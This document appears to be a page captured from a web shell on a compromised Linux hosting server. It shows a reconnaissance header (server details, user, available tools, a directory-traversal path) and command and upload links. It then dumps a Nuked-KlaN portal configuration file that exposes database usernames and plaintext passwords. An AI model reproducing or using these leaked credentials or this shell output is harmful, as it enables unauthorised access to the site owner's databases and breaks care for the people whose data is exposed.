|
Server IP : 10.128.40.6 / Your IP : 216.73.216.152 Web Server : Apache System : Linux webd006.cluster128.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64 User : logmcpe ( 111175) PHP Version : 7.3.33 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0705) : /home/logmcpe/www/TEST/../MC/temp/1976/../15/../../code/../code/../../MC/code/../forum/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
//-------------------------------------------------------------------------//
// Nuked-KlaN - PHP Portal //
// http://www.nuked-klan.org //
//-------------------------------------------------------------------------//
// This program is free software. you can redistribute it and/or modify //
// it under the terms of the GNU General Public License as published by //
// the Free Software Foundation; either version 2 of the License. //
//-------------------------------------------------------------------------//
/*$global['db_host'] = 'localhost';
$global['db_user'] = 'forum-mc';
$global['db_pass'] = 'gr0mit';
$global['db_name'] = 'forummc';
$db_prefix = '';*/
$global['db_host'] = 'localhost';
$global['db_user'] = 'gestionmc';
$global['db_pass'] = 'SQXvrJxzmeLY8qXf';
$global['db_name'] = 'menagecie';
$db_prefix = 'z';
define('NK_INSTALLED', true);
define('NK_OPEN', true);
define('NK_GZIP', true);
?>